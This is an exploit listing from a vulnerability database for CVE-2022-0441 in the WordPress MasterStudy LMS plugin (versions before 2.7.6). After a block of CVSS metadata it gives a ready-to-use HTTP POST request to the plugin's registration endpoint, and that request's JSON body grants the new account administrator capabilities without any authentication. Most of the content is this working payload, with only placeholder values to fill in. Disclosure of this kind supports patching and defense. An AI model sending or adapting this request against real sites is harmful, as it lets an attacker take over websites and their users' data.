WordPress MasterStudy LMS 2.7.5 Account Creation

2022.02.23
Credit: numan turle
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2022-0441
CWE: CWE-269


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Title: WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation # Date: 16.02.2022 # Author: Numan Türle # CVE: CVE-2022-0441 # Software Link: https://wordpress.org/plugins/masterstudy-lms-learning-management-system/ # Version: <2.7.6 # https://www.youtube.com/watch?v=SI_O6CHXMZk # https://gist.github.com/numanturle/4762b497d3b56f1a399ea69aa02522a6 # https://wpscan.com/vulnerability/173c2efe-ee9c-4539-852f-c242b4f728ed POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce=[NONCE] HTTP/1.1 Connection: close Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest Accept-Encoding: gzip, deflate Accept-Language: tr,en;q=0.9,tr-TR;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4 Content-Type: application/json Content-Length: 339 {"user_login":"USERNAME","user_email":"EMAIL@TLD","user_password":"PASSWORD","user_password_re":"PASSWORD","become_instructor":"","privacy_policy":true,"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}}


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top